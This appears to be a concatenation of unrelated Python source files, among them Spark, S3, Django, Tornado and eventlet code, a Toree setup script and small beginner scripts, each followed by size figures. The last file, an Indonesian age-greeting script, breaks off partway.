# int(x) converts a string to an integer
# str(x) converts an integer to a string
# to check a value's type: print(type(x))
# you can only concatenate values of the same type, unless doing string interpolation.
# difference between string interpolation and comma is that the variable cannot be placed in the middle
number=1
name="grace"
# assigning string "grace" into variable "name" (overwrites the input above)
result=str(number)+" "+name
print(result)
print(number,name)
| 542 | 162 |
from pyspark.mllib.feature import HashingTF, IDF
from pyspark.mllib.regression import LabeledPoint
from pyspark.mllib.classification import NaiveBayes
import os.path
os.environ["SPARK_HOME"] = "/usr/local/spark"
os.environ["PYSPARK_PYTHON"]="/System/Library/Frameworks/Python.framework/Versions/2.7/bin/python2.7"
from pyspark import SparkContext
def parseLine(line):
    """Parse a 'label,text' CSV record into a one-element list of dicts."""
    fields = line.split(',')
    record = {"label": float(fields[0]), "text": fields[1]}
    return [record]
# Read the data and parse it into a list
# NOTE(review): this script uses Python 2 syntax (`print x` statements and a
# tuple-unpacking lambda below) and will not run under Python 3.
sc = SparkContext("local[4]","NaiveBayesClassifier")
data = sc.textFile("training_test_data.txt").map(parseLine)
'''
Split data into labels and features, transform
preservesPartitioning is not really required
since map without partitioner shouldn't trigger repartitiong
'''
# Extract all the "labels" (each RDD element is a one-item list of dicts)
labels = data.map(lambda doc: doc[0]["label"], preservesPartitioning = True)
for x in labels.take(3):
    print x
# Perform TF-IDF
tf = HashingTF().transform(data.map(lambda doc: doc[0]["text"], preservesPartitioning=True))
idf = IDF().fit(tf)
tfidf = idf.transform(tf)
# Combine labels and tfidf and create LabeledPoint data
dataset = labels.zip(tfidf).map(lambda x: LabeledPoint(x[0], x[1]))
for x in dataset.take(3):
    print(x)
result=[]
'''
Random split dataset - 60% as training data and 40% as testing.
Train and test the model 10 times. Then put the accuracy into result[]
'''
for i in range(0,10):
    training, test = dataset.randomSplit([0.6,0.4],seed=i)
    model = NaiveBayes.train(training,1.0)
    predictionAndLabel = test.map(lambda p: (model.predict(p.features), p.label))
    accuracy = 1.0 * predictionAndLabel.filter(lambda (x, v): x == v).count() / test.count()
    result.append(accuracy)
    print(accuracy)
print(result)
# Save the model (only the model from the final split is persisted)
model.save(sc,"mynewmodel")
import tempfile
from pathlib import Path
import boto3
from moto import mock_s3
from minato.filesystems import S3FileSystem
@mock_s3
def test_open_file() -> None:
    """Writing then reading through S3FileSystem round-trips the content."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    fs = S3FileSystem("s3://my_bucket/path/to/file")
    with fs.open_file("w") as handle:
        handle.write("Hello, world!")
    with fs.open_file("r") as handle:
        text = handle.read()
    assert text == "Hello, world!"
@mock_s3
def test_download_file() -> None:
    """Downloading a single object drops the file into the target directory."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    url = "s3://my_bucket/path/to/file"
    with S3FileSystem(url).open_file("w") as handle:
        handle.write("file")
    with tempfile.TemporaryDirectory() as workdir:
        destination = Path(workdir)
        S3FileSystem(url).download(destination)
        assert (destination / "file").is_file()
@mock_s3
def test_download_dir_with_trailing_slash() -> None:
    """A trailing-slash prefix downloads the directory *contents* directly."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    for key, body in [("s3://my_bucket/path/to/dir/foo.txt", "foo"),
                      ("s3://my_bucket/path/to/dir/bar/bar.txt", "bar")]:
        with S3FileSystem(key).open_file("w") as handle:
            handle.write(body)
    with tempfile.TemporaryDirectory() as workdir:
        destination = Path(workdir)
        S3FileSystem("s3://my_bucket/path/to/dir/").download(destination)
        assert (destination / "foo.txt").is_file()
        assert (destination / "bar").is_dir()
        assert (destination / "bar" / "bar.txt").is_file()
@mock_s3
def test_download_dir_without_trailing_slash() -> None:
    """Without a trailing slash the remote directory itself is recreated."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    for key, body in [("s3://my_bucket/path/to/dir/foo.txt", "foo"),
                      ("s3://my_bucket/path/to/dir/bar/bar.txt", "bar")]:
        with S3FileSystem(key).open_file("w") as handle:
            handle.write(body)
    with tempfile.TemporaryDirectory() as workdir:
        destination = Path(workdir)
        S3FileSystem("s3://my_bucket/path/to/dir").download(destination)
        assert (destination / "dir" / "foo.txt").is_file()
        assert (destination / "dir" / "bar").is_dir()
        assert (destination / "dir" / "bar" / "bar.txt").is_file()
@mock_s3
def test_exists() -> None:
    """exists() is true for prefixes and stored objects, false otherwise."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    with S3FileSystem("s3://my_bucket/path/to/dir/foo.txt").open_file("w") as handle:
        handle.write("foo")
    assert S3FileSystem("s3://my_bucket/path/to/dir").exists()
    assert S3FileSystem("s3://my_bucket/path/to/dir/foo.txt").exists()
    assert not S3FileSystem("s3://my_bucket/path/to/dir/bar.txt").exists()
@mock_s3
def test_delete() -> None:
    """delete() removes everything under the prefix."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    with S3FileSystem("s3://my_bucket/path/to/dir/foo.txt").open_file("w") as handle:
        handle.write("foo")
    target = S3FileSystem("s3://my_bucket/path/to/dir")
    assert target.exists()
    target.delete()
    assert not target.exists()
@mock_s3
def test_get_version() -> None:
    """get_version() returns a two-part dotted identifier for a prefix."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    for key, body in [("s3://my_bucket//dir/foo.txt", "foo"),
                      ("s3://my_bucket//dir/bar.txt", "bar")]:
        with S3FileSystem(key).open_file("w") as handle:
            handle.write(body)
    version = S3FileSystem("s3://my_bucket//dir").get_version()
    assert version is not None
    assert len(version.split(".")) == 2
@mock_s3
def test_update_version() -> None:
    """Rewriting an object changes its version; re-reading does not."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    fs = S3FileSystem("s3://my_bucket//dir/foo.txt")
    with fs.open_file("w") as handle:
        handle.write("hello")
    first = fs.get_version()
    assert first is not None
    repeat = fs.get_version()
    assert repeat is not None
    assert repeat == first
    with fs.open_file("w") as handle:
        handle.write("world")
    second = fs.get_version()
    assert second is not None
    assert second != first
@mock_s3
def test_upload_file(tmpdir: Path) -> None:
    """Uploading a local file to an object key stores its content."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    source = tmpdir / "foo.txt"
    with open(source, "w") as handle:
        handle.write("this is foo!")
    fs = S3FileSystem("s3://my_bucket/dir/foo.txt")
    assert not fs.exists()
    fs.upload(source)
    assert fs.exists()
    with fs.open_file("r") as handle:
        assert handle.read() == "this is foo!"
@mock_s3
def test_upload_file_to_dir(tmpdir: Path) -> None:
    """Uploading a file to a trailing-slash prefix stores it under the prefix."""
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    source = tmpdir / "foo.txt"
    with open(source, "w") as handle:
        handle.write("this is foo!")
    prefix = S3FileSystem("s3://my_bucket/dir/")
    assert not prefix.exists()
    prefix.upload(source)
    uploaded = S3FileSystem("s3://my_bucket/dir/foo.txt")
    assert uploaded.exists()
    with uploaded.open_file("r") as handle:
        assert handle.read() == "this is foo!"
@mock_s3
def test_upload_dir(tmpdir: Path) -> None:
    """Uploading a directory to a bare prefix copies its files directly under it."""
    workdir = tmpdir / "work"
    workdir.mkdir()
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    contents = [("foo.txt", "this is foo!"), ("bar.txt", "this is bar!")]
    for name, body in contents:
        with open(workdir / name, "w") as handle:
            handle.write(body)
    prefix = S3FileSystem("s3://my_bucket/dir")
    assert not prefix.exists()
    prefix.upload(workdir)
    for name, body in contents:
        uploaded = S3FileSystem("s3://my_bucket/dir/" + name)
        assert uploaded.exists()
        with uploaded.open_file("r") as handle:
            assert handle.read() == body
@mock_s3
def test_upload_dir_to_dir(tmpdir: Path) -> None:
    """Uploading a directory to a trailing-slash prefix nests it by name."""
    workdir = tmpdir / "work"
    workdir.mkdir()
    boto3.resource("s3", region_name="us-east-1").create_bucket(Bucket="my_bucket")
    contents = [("foo.txt", "this is foo!"), ("bar.txt", "this is bar!")]
    for name, body in contents:
        with open(workdir / name, "w") as handle:
            handle.write(body)
    prefix = S3FileSystem("s3://my_bucket/dir/")
    assert not prefix.exists()
    prefix.upload(workdir)
    for name, body in contents:
        uploaded = S3FileSystem("s3://my_bucket/dir/work/" + name)
        assert uploaded.exists()
        with uploaded.open_file("r") as handle:
            assert handle.read() == body
| 7,298 | 2,727 |
from django.test import TestCase
from django.urls import reverse
from django.utils import timezone
from django.contrib.auth import get_user_model
from rest_framework.test import APIClient
from rest_framework import status
from core.models import Category, School, Session, Subject, Level, Lesson, \
Moderation
from school.serializers import SessionSerializer, ModerationSerializer, \
UserSerializer
reg_url = '/api/v1/accounts/auth/registration/'
class TestPrivateModerationApi(TestCase):
    """Tests for the moderation API endpoints that require authentication.

    Fixes: removed the duplicated ``self.client = APIClient()`` in setUp and
    factored the identical category/school/subject/level/lesson/session
    fixture graph (previously copy-pasted into five tests) into
    ``_build_session_fixture``. Fixture data is unchanged.
    """

    def setUp(self):
        # Register a fresh user and authenticate the test client with its token.
        self.client = APIClient()
        payload = {
            "email": "testuser@bondeveloper.com",
            "password": "Qwerty!@#",
            "password1": "Qwerty!@#",
            "password2": "Qwerty!@#",
            "username": "testuser01"
        }
        auth_user = self.client.post(reg_url, payload, format='json')
        access_token = auth_user.data.get('access_token')
        self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + access_token)

    def _build_session_fixture(self):
        """Create the full lesson/session object graph used by every test.

        Returns (session, learner) — the pieces the tests attach
        moderations to. Data (including the original '.coom' emails) is
        byte-identical to the previous inline copies.
        """
        learner = get_user_model().objects.create(
            username="learner01",
            email="learner@bondeveloper.coom",
            password="Qwerty!@#",
        )
        learner2 = get_user_model().objects.create(
            username="learner02",
            email="learner02@bondeveloper.coom",
            password="Qwerty!@#",
        )
        instructor = get_user_model().objects.create(
            username="instructor",
            email="instructor@bondeveloper.coom",
            password="Qwerty!@#",
        )
        cat = Category.objects.create(basename="sample1",
                                      name="Sample Category")
        sch = School.objects.create(basename="gruut-high", name="Gruut High",
                                    category=cat)
        sub = Subject.objects.create(basename="spanish-fal",
                                     name="Spanish FAL", school=sch)
        level = Level.objects.create(basename="grade-9", name="Grade 9",
                                     school=sch)
        les = Lesson.objects.create(subject=sub, level=level,
                                    instructor=instructor, name="Python 101")
        les.learners.add(learner, learner2)
        ses = Session.objects.create(start_time=timezone.now(), type="TCN",
                                     end_time=timezone.now(), lesson=les)
        return ses, learner

    def test_authentication_required(self):
        # An unauthenticated client must get 401 from the list endpoint.
        self.client = APIClient()
        res = self.client.get(reverse('school:moderation-list'))
        self.assertEquals(res.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_moderation_create_successful(self):
        ses, learner = self._build_session_fixture()
        payload = {
            "session": SessionSerializer(ses).data.get('id'),
            "learner": UserSerializer(learner).data.get('id'),
            "learner_score": 45,
            "max_score": 100,
            "score_type": "unit",
        }
        res = self.client.post(reverse("school:moderation-create"),
                               payload, format='json'
                               )
        self.assertEquals(res.status_code, status.HTTP_201_CREATED)
        self.assertEquals(res.data.get('learner_score'), 45)

    def test_moderation_update_api(self):
        ses, learner = self._build_session_fixture()
        mod = Moderation.objects.create(session=ses, learner=learner,
                                        learner_score=20, max_score=100,
                                        score_type="unit")
        res = self.client.patch(
            reverse("school:moderation-update", args=[mod.id]),
            ModerationSerializer(mod).data,
            format='json'
        )
        self.assertEquals(res.status_code, status.HTTP_200_OK)
        self.assertEquals(res.data.get('score_type'), 'unit')

    def test_moderation_list_successful(self):
        ses, learner = self._build_session_fixture()
        Moderation.objects.create(session=ses, learner=learner,
                                  learner_score=20, max_score=100,
                                  score_type="unit")
        Moderation.objects.create(session=ses, learner=learner,
                                  learner_score=40, max_score=100,
                                  score_type="percentage")
        res = self.client.get(reverse('school:moderation-list'))
        self.assertEquals(res.status_code, status.HTTP_200_OK)
        self.assertEquals(len(res.data), 2)

    def test_moderation_delete_successful(self):
        ses, learner = self._build_session_fixture()
        mod1 = Moderation.objects.create(session=ses, learner=learner,
                                         learner_score=20, max_score=100,
                                         score_type="unit")
        Moderation.objects.create(session=ses, learner=learner,
                                  learner_score=40, max_score=100,
                                  score_type="percentage")
        ser = ModerationSerializer(Moderation.objects.all(), many=True)
        self.assertEquals(len(ser.data), 2)
        res = self.client.delete(reverse(
            'school:moderation-delete',
            args=[mod1.id]
        ),
            ser.data, format='json'
        )
        self.assertEquals(res.status_code, status.HTTP_204_NO_CONTENT)
        ser = ModerationSerializer(Moderation.objects.all(), many=True)
        self.assertEquals(len(ser.data), 1)

    def test_moderation_retrieve_successful(self):
        ses, learner = self._build_session_fixture()
        mod1 = Moderation.objects.create(session=ses, learner=learner,
                                         learner_score=20, max_score=100,
                                         score_type="unit")
        Moderation.objects.create(session=ses, learner=learner,
                                  learner_score=40, max_score=100,
                                  score_type="percentage")
        res = self.client.get(reverse("school:moderation-view",
                                      args=[mod1.id]
                                      )
                              )
        self.assertEquals(res.status_code, status.HTTP_200_OK)
        self.assertEquals(res.data.get('score_type'), 'unit')
| 12,269 | 3,516 |
from .create_invite import CreateInviteController
from ..usecases import create_invite_usecase
# Composition root: bind the invite-creation controller to its use case.
create_invite_controller = CreateInviteController(create_invite_usecase)
| 169 | 48 |
import traceback, logging, signal, time, ssl
from functools import partial
from tornado import httpserver, ioloop, log
from tornado.web import Application
import settings, isetools, isehandlers, ruckushandlers
PORT = 2443
def create_server(serverlist, username, password, emailer=None, certfile=None,
                  keyfile=None):
    """Build and return a Tornado HTTPServer wrapping the ISE/Ruckus app.

    With both certfile and keyfile the server terminates TLS itself;
    otherwise it trusts X-Forwarded-* headers from a front-end proxy.
    """
    tools = isetools.ISETools(serverlist, username, password, emailer)
    isehandlers.assign_objects(tools)
    app = Application(isehandlers.handlers + ruckushandlers.handlers,
                      debug=True)
    if not (certfile and keyfile):
        # No certificates: assume a TLS-terminating proxy (like nginx) in front.
        return httpserver.HTTPServer(app, xheaders=True)
    ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    ssl_ctx.load_cert_chain(certfile, keyfile)
    return httpserver.HTTPServer(app, ssl_options=ssl_ctx)
def signal_handler(server, sig, frame):
    """Handle shutdown signals (like SIGTERM) to shut off the web server
    gracefully.
    """
    io_loop = ioloop.IOLoop.current()
    def stop_loop(deadline):
        # Re-check once a second until pending callbacks/timeouts drain or the
        # deadline passes, then stop the loop.
        # NOTE(review): _callbacks/_timeouts are private IOLoop attributes and
        # may be absent on newer Tornado releases — verify against the pinned
        # Tornado version.
        if (time.time() < deadline and
            (io_loop._callbacks or io_loop._timeouts)): #pylint: disable=no-member
            io_loop.add_timeout(time.time() + 1, stop_loop, deadline)
        else:
            io_loop.stop()
    def shutdown():
        logging.info('Signal received, stopping web server')
        server.stop()
        # wait 2 seconds after receiving SIGINT to complete requests
        stop_loop(time.time() + 2)
    # add_callback_from_signal is the IOLoop API that is safe to invoke from a
    # signal-handler context.
    io_loop.add_callback_from_signal(shutdown)
if __name__ == "__main__":
    # Fail fast if settings.py lacks any required configuration value.
    if not hasattr(settings, 'ISE_SERVERLIST'):
        raise ValueError("settings.py missing ISE_SERVERLIST (list of IP/FQDN strings)")
    elif not hasattr(settings, 'ISE_USERNAME'):
        raise ValueError("settings.py missing ISE_USERNAME (string)")
    elif not hasattr(settings, 'ISE_PASSWORD'):
        raise ValueError("settings.py missing ISE_PASSWORD (string)")
    elif not hasattr(settings, 'CERTFILE'):
        raise ValueError("settings.py missing CERTFILE (HTTPS certificate .cer filename)")
    elif not hasattr(settings, 'KEYFILE'):
        raise ValueError("settings.py missing KEYFILE (HTTPS private key .key filesname)")
    log.enable_pretty_logging() # set up Tornado-formatted logging
    logging.root.handlers[0].setFormatter(log.LogFormatter())
    server = create_server(settings.ISE_SERVERLIST, settings.ISE_USERNAME,
                           settings.ISE_PASSWORD, certfile=settings.CERTFILE,
                           keyfile=settings.KEYFILE)
    # Install graceful-shutdown handlers before starting the loop.
    signal.signal(signal.SIGTERM, partial(signal_handler, server))
    signal.signal(signal.SIGINT, partial(signal_handler, server))
    logging.info("Starting...")
    server.listen(PORT)
    ioloop.IOLoop.current().start()
    logging.info("Stopping...")
| 2,937 | 904 |
#!/usr/bin/env python3
# -*- encoding=utf-8 -*-
# description:
# author:jack
# create_time: 2019-07-04
from dueros.directive.BaseDirective import BaseDirective
class Buy(BaseDirective):
    """Builder for a Connections.SendRequest.Buy directive.

    Args:
        product_id: id of the product being purchased.
        token: optional request token; only attached when non-empty.
    """
    def __init__(self, product_id, token=''):
        super(Buy, self).__init__('Connections.SendRequest.Buy')
        self.data['payload']['productId'] = product_id
        if token:
            self.data['token'] = token
| 446 | 163 |
__all__ = ('Actions', 'LoggerInterface', 'RunCallback', 'FileCallback', 'Logger', 'DummyLoggerInterface')
#
# Interface: group of loggers which can attach multiple loggers.
#
class Actions(object):
    """String constants naming the loggable action types."""
    Run = 'run'
    Open = 'open'
    Fork = 'fork'
class LoggerInterface(object):
    """
    Base class for logging interaction on hosts.
    (Not threadsafe)
    """
    # NOTE: nested helper classes below deliberately name their first method
    # parameter `context` or `entry` instead of `self`, so that `self` inside
    # their bodies still refers (via closure) to this LoggerInterface.
    def __init__(self):
        # Loggers currently attached; every log_* call fans out to all of them.
        self.loggers = []
    def attach(self, logger):
        """
        Attach logger to logging interface.
        """
        self.loggers.append(logger)
    def detach(self, logger):
        """
        Remove logger from logging interface.
        """
        self.loggers.remove(logger)
    def attach_in_block(self, logger):
        """Return a context manager that attaches `logger` for the duration
        of a `with` block and detaches it again on exit."""
        class LoggerAttachment(object):
            def __enter__(context):
                self.attach(logger)
            def __exit__(context, *a):
                self.detach(logger)
        return LoggerAttachment()
    def group(self, func_name, *args, **kwargs):
        """Context manager that brackets a group of log entries, notifying
        attached loggers via enter_group/leave_group."""
        class LogGroup(object):
            def __enter__(context):
                # Snapshot the logger list so attach/detach during the group
                # cannot unbalance the enter_group/leave_group pairs.
                context.loggers = self.loggers[:]
                for l in context.loggers:
                    l.enter_group(func_name, *args, **kwargs)
            def __exit__(context, *a):
                for l in context.loggers:
                    l.leave_group()
        return LogGroup()
    def log_fork(self, fork_name):
        """Create a fork log entry; attached loggers are notified immediately
        through their log_fork callbacks."""
        class Fork(object):
            entry_type = Actions.Fork
            def __init__(entry):
                entry.fork_name = fork_name
                entry._callbacks = [ l.log_fork(entry) for l in self.loggers ]
                entry.succeeded = None
                entry.exception = None
            def set_succeeded(entry):
                # Mark the fork successful and fire each callback's completion.
                entry.succeeded = True
                for c in entry._callbacks:
                    c.completed()
            def set_failed(entry, exception):
                entry.succeeded = False
                entry.exception = exception
                for c in entry._callbacks:
                    c.completed()
            def get_logger_interface(entry):
                """
                Return a new logger interface object, which will be used
                in this fork (thread).
                """
                interface = LoggerInterface()
                for c in entry._callbacks:
                    interface.attach(c.get_fork_logger())
                return interface
        return Fork()
    def log_run(self, *a, **kwargs):
        """
        Log SSH commands.
        """
        class Run(object):
            entry_type = Actions.Run
            def __init__(entry, host=None, command=None, use_sudo=False, sandboxing=False, interactive=False, shell=False):
                entry.host = host
                entry.command = command
                entry.use_sudo = use_sudo
                entry.sandboxing = sandboxing
                entry.interactive = interactive
                entry.shell = shell
                # 'unknown' until set_status_code is called with the real code.
                entry.status_code = 'unknown'
                entry._callbacks = []
                entry._io = []
            def set_status_code(entry, status_code):
                entry.status_code = status_code
            @property
            def succeeded(entry):
                # Success is exit status 0.
                return entry.status_code == 0
            @property
            def io(entry):
                # All captured I/O fragments joined into one string.
                return ''.join(entry._io)
            def __enter__(entry):
                entry._callbacks = [ l.log_run(entry) for l in self.loggers ]
                return entry
            def __exit__(entry, *a):
                for c in entry._callbacks:
                    c.completed()
        return Run(*a, **kwargs)
    def log_file(self, host, **kwargs):
        """
        Log a get/put/open actions on remote files.
        """
        class File(object):
            entry_type = Actions.Open
            def __init__(entry, host, mode=None, remote_path=None, local_path=None, use_sudo=False, sandboxing=False):
                entry.host = host
                entry.remote_path = remote_path
                entry.local_path = local_path
                entry.mode = mode # Required for 'open()' action.
                entry.use_sudo = use_sudo
                entry.sandboxing = sandboxing
                entry.succeeded = None # Unknown yet
            def complete(entry, succeeded=True):
                entry.succeeded = succeeded
            def __enter__(entry):
                entry._callbacks = [ l.log_file_opened(entry) for l in self.loggers ]
                return entry
            def __exit__(entry, *a):
                for c in entry._callbacks:
                    c.file_closed()
        return File(host, **kwargs)
    def log_exception(self, e):
        # Broadcast an exception to every attached logger.
        for l in self.loggers:
            l.log_exception(e)
    def log_msg(self, msg):
        # Broadcast a plain message to every attached logger.
        for l in self.loggers:
            l.log_msg(msg)
class DummyLoggerInterface(LoggerInterface):
    """
    Dummy logger interface: inherits the empty logger list, so every log
    call is a no-op broadcast. Useful as a null object.
    """
    pass
#
# Base logger
#
class Logger(object):
    """No-op base class for concrete loggers; subclasses override only the
    hooks they care about."""
    #
    # Following methods are to be overriden by specific loggers.
    #
    def enter_group(self, func_name, *args, **kwargs):
        pass
    def leave_group(self):
        pass
    def log_fork(self, fork_name):
        # Returns a callback object for the fork entry.
        return ForkCallback()
    def log_run(self, run_entry):
        # Returns a callback object for the run entry.
        return RunCallback()
    def log_file_opened(self, file_entry):
        # Returns a callback object for the file entry.
        return FileCallback()
    def log_exception(self, e):
        pass
    def log_msg(self, msg):
        pass
#
# Callbacks
#
class RunCallback(object):
    """Callback holder for a logged run; `completed` fires when it finishes.

    A replacement hook may be supplied at construction time.
    """
    def completed(self):
        # Default hook: do nothing.
        pass

    def __init__(self, completed=None):
        # Shadow the class-level hook with the supplied callable, if any.
        if completed:
            self.completed = completed
class FileCallback(object):
    """Callback holder for a logged file action; `file_closed` fires when the
    file is closed. A replacement hook may be supplied at construction."""
    def file_closed(self):
        # Default hook: do nothing.
        pass

    def __init__(self, file_closed=None):
        # Shadow the class-level hook with the supplied callable, if any.
        if file_closed:
            self.file_closed = file_closed
class ForkCallback(object):
    """Callback holder for a logged fork."""
    def completed(self):
        # Nothing to do by default.
        pass

    def get_fork_logger(self):
        # Forked threads receive a no-op logger unless overridden.
        return Logger()
| 6,064 | 1,656 |
import numpy as np
def generate_binary_distribution(batchsize, dim):
    """Return a (batchsize, dim) float array whose rows are independent random
    permutations of a half-zeros/half-ones vector.

    Each row contains floor(dim/2) zeros and dim - floor(dim/2) ones, in a
    uniformly random order.

    Improvements over the original: the base zeros/ones vector is built once
    (it was rebuilt elementwise in Python for every batch row) and the shuffle
    is expressed with np.random.permutation instead of an index buffer.

    Args:
        batchsize: number of rows to generate.
        dim: length of each row.
    Returns:
        np.ndarray of shape (batchsize, dim) with values in {0.0, 1.0}.
    """
    base = np.zeros(dim)
    base[dim // 2:] = 1.0  # loop-invariant: identical for every row
    z_batch = np.empty((batchsize, dim))
    for b in range(batchsize):
        z_batch[b] = base[np.random.permutation(dim)]
    return z_batch
| 477 | 164 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
from setuptools import setup
here = os.path.abspath(os.path.dirname(__file__))
version_ns = {}
# Execute toree/_version.py in an empty namespace to read __version__
# without importing the package.
with open(os.path.join(here, 'toree', '_version.py')) as f:
    exec(f.read(), {}, version_ns)
setup_args = dict(
    name='toree',
    author='Apache Toree Development Team',
    author_email='dev@toree.incubator.apache.org',
    description='A Jupyter kernel for enabling remote applications to interaction with Apache Spark.',
    long_description = '''
This package will install Apache Toree as a Jupyter kernel.
Apache Toree is an effort undergoing incubation at the Apache Software
Foundation (ASF), sponsored by the Apache Incubator PMC.
Incubation is required of all newly accepted projects until a further review
indicates that the infrastructure, communications, and decision making process
have stabilized in a manner consistent with other successful ASF projects.
While incubation status is not necessarily a reflection of the completeness
or stability of the code, it does indicate that the project has yet to be
fully endorsed by the ASF.
''',
    url='http://toree.incubator.apache.org/',
    version=version_ns['__version__'],
    license='Apache License 2.0',
    platforms=[],
    packages=['toree'],
    include_package_data=True,
    install_requires=[
        'jupyter_core>=4.0',
        'jupyter_client>=4.0',
        'traitlets>=4.0, <5.0'
    ],
    data_files=[],
    classifiers=[
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: Apache Software License',
        'Programming Language :: Python',
        'Programming Language :: SQL'
    ]
)
if 'setuptools' in sys.modules:
    # setupstools turns entrypoint scripts into executables on windows
    setup_args['entry_points'] = {
        'console_scripts': [
            'jupyter-toree = toree.toreeapp:main'
        ]
    }
    # Don't bother installing the .py scripts if if we're using entrypoints
    setup_args.pop('scripts', None)
if __name__ == '__main__':
    setup(**setup_args)
| 2,949 | 857 |
import threading
import sys
import subprocess
import eventlet
import eventlet.tpool
import eventlet.green.subprocess
from eventlet import green
eventlet.monkey_patch()
def consume(stream, pref=b'T> '):
    """Pump `stream` to stdout in 1KB chunks, prefixing each line with `pref`.

    The CHK prints are debug tracing and are kept verbatim.
    """
    print("CHK consume 1")
    pending_prefix = pref
    while True:
        print("CHK consume 2")
        chunk = stream.read(1024)
        print("CHK consume 3")
        if not chunk:
            break
        if pending_prefix:
            # Prefix only the very first chunk; later lines are prefixed
            # via the newline replacement below.
            chunk = pending_prefix + chunk
            pending_prefix = None
        sys.stdout.buffer.write(chunk.replace(b'\n', b'\n' + pref))
        print("CHK consume 4")
        sys.stdout.flush()
    print("CHK consume 5")
def start_daemon_thread(fn):
    """Run `fn` on a new daemon thread, start it and return the thread."""
    worker = threading.Thread(target=fn)
    worker.daemon = True
    print("CHK start_daemon_thread 1")
    worker.start()
    print("CHK start_daemon_thread 2")
    return worker
def consume_input():
    """Forward lines typed on our stdin to the child process's stdin."""
    print("CHK consume_input input")
    while True:
        typed = input() + '\n'
        print("CHK consume_input line", typed)
        # The child expects ASCII bytes; flush so it sees the line promptly.
        proc.stdin.write(typed.encode('ascii'))
        proc.stdin.flush()
# Launch the child with eventlet's green subprocess so pipe reads cooperate
# with green threads; bufsize=0 keeps the pipes unbuffered.
# NOTE(review): "cmd" implies a Windows command shell child — confirm platform.
proc = green.subprocess.Popen("cmd", stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
def spawn(fn):
    """Run fn concurrently; currently backed by daemon threads (alternatives kept below)."""
    print("CHK spawn")
    return start_daemon_thread(fn)
    #return eventlet.spawn(fn)
    #return eventlet.tpool.execute(fn)
# Mirror the child's stdout/stderr onto our stdout with distinguishing prefixes.
thread1 = spawn(lambda: consume(proc.stdout, b"T> "))
thread2 = spawn(lambda: consume(proc.stderr, b"E> "))
print("CHK sleeping")
eventlet.sleep(2)
consume_input()
| 1,488 | 515 |
"""CLI utils for easy command line extras."""
import click
from climatecontrol import core
def click_settings_file_option(
    settings_obj: core.Climate, click_obj=click, option_name="settings", **kw
):
    """Build a `click` option decorator that loads settings from file paths.

    Args:
        settings_obj: settings object the file contents are loaded into.
        click_obj: object providing ``option`` and ``Path`` (defaults to the
            ``click`` module).
        option_name: long name of the option; its first letter becomes the
            short flag.
        **kw: extra keyword arguments overriding the defaults passed to
            ``click_obj.option``.

    Example:
        Given a command line script `cli.py`:

        .. code-block:: python

            import click
            from climatecontrol import core, cli_utils
            settings_map = settings_parser.Climate(env_prefix='TEST_STUFF')

            @click.command()
            @cli_utils.click_settings_file_option(settings_map)
            def tmp_cli():
                pass

        And running the script:

        .. code-block:: bash

            python cli.py --settings 'my_settings_file.yaml'

        will load settings from `my_settings_file.yaml` into the
        `settings_map` object which can then be used in the script.
    """
    def _load_settings(ctx, param, value):
        # Eager callback: assign the chosen files and refresh the settings
        # object immediately.
        if value:
            settings_obj.settings_files = value
            settings_obj.update()

    defaults = {
        "help": "Settings file path for loading settings from file.",
        "callback": _load_settings,
        "type": click_obj.Path(exists=True, dir_okay=False, resolve_path=True),
        "expose_value": False,
        "is_eager": True,
        "multiple": True,
    }
    defaults.update(kw)
    return click_obj.option(
        "--{}".format(option_name), "-{}".format(option_name[0]), **defaults
    )
| 1,591 | 454 |
"""
"""
from clldutils.clilib import PathType
from pyglottolog.references import evobib
def register(parser):
    """Register the CLI argument for the downloaded EvoBib file."""
    parser.add_argument(
        'bib',
        help='path to downloaded evobib-converted.bib',
        type=PathType(type='file'))
def run(args):  # pragma: no cover
    """Merge the downloaded bib into the repository's evobib.bib."""
    target = args.repos.bibfiles['evobib.bib']
    evobib.update(args.bib, target, args.log)
| 356 | 125 |
# import the libraries we need
import datetime
import time  # was missing: time.sleep below raised NameError at runtime

# ask for the user's name
nama = input("Hallo... nama saya Mr. Kompie, nama Anda siapa? ")
# greet the user by name
print("Oh.. nama Anda", nama, ", nama yang bagus sekali.")
# pause for 3 seconds
time.sleep(3)
# ask for the birth year (space added after the name so the prompt reads correctly)
thnLahir = int(input("BTW... " + nama + " kamu lahir tahun berapa? "))
# pause for 3 seconds
time.sleep(3)
# compute the user's age from the current year
skrg = datetime.datetime.now()
usia = skrg.year - thnLahir
# show the age
print("Hmmm...", nama, "kamu sudah", usia, "tahun ya..")
# pause for 3 seconds
time.sleep(3)
# show a message matching the age range; exactly 17 previously matched no
# branch, so the teenager branch now uses >= 17 and the final case is `else`
if usia > 50:
    print("Anda sudah cukup tua ya?")
    print("Jaga kesehatan ya!!")
elif usia > 20:
    print("Ternyata Anda masih cukup muda belia")
